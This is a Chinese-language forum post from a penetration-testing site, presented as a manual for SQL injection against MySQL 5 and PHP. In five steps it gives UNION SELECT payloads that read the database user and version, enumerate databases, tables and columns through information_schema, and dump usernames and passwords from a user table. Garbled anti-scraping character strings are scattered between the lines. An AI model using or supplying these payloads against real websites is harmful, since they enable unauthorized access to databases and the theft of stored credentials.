中国网络渗透测试联盟
标题:
mysql盲注手册
[打印本页]
作者:
admin
时间:
2012-9-13 16:27
标题:
mysql盲注手册
* D4 p" \, A+ Q4 y
教程内容:Mysql 5+php 注入
! S4 ^, q# D6 c
8 d+ ?% x; }4 b$ w' ^
: p9 l$ B9 t2 T' r* h$ `
* ?& ^) b# }' Q( `, p& y3 V C
一.查看MYSQL基本信息(库名,版本,用户)
f3 @" P: O, J1 l
8 I7 N3 `' f. h$ R
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
3 c8 T1 y0 q8 {
- N+ w* _8 K+ N% i; I# Y
二.查数据库
( j( m9 x4 V, S' t" k! c
! V( l$ x1 f% a7 m* E7 R3 U
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
4 O. ~* O7 {4 `7 y, W3 O
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
/ O! m7 Z% m4 L+ u
8 I# w* N4 S/ ]
三.暴表
* Z, V8 y5 s4 E; C6 `
% ^" k3 ]& [! g5 ?( b
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
3 w0 O8 ?5 a7 p) I1 K
+ q# Y- L* \. E' J5 k
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
( f& ?2 n0 K: f1 @: U
0 S9 L) D0 S J
四.暴字段
, x6 K6 t4 d. j/ w! B. i+ C
. q$ G2 r9 U0 Z ?5 D; \
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
2 g7 ^$ t2 A V6 {
& R$ \ D% n! O
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
- c) K- r* x# Z' m5 ~1 L# C
" N- S- U1 f# |% v+ q1 @# u
五.暴数据
! v8 `1 E; u# Y- S$ O
5 X% P% M* ^6 J/ B
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
, k9 p# g" D" j# J& v
" |: ^1 p9 F2 L" W' ]; H& X- A
/ Y) n% v- t' T- b
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
K0 c6 ?1 @2 c$ o0 E; \, Z8 l
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2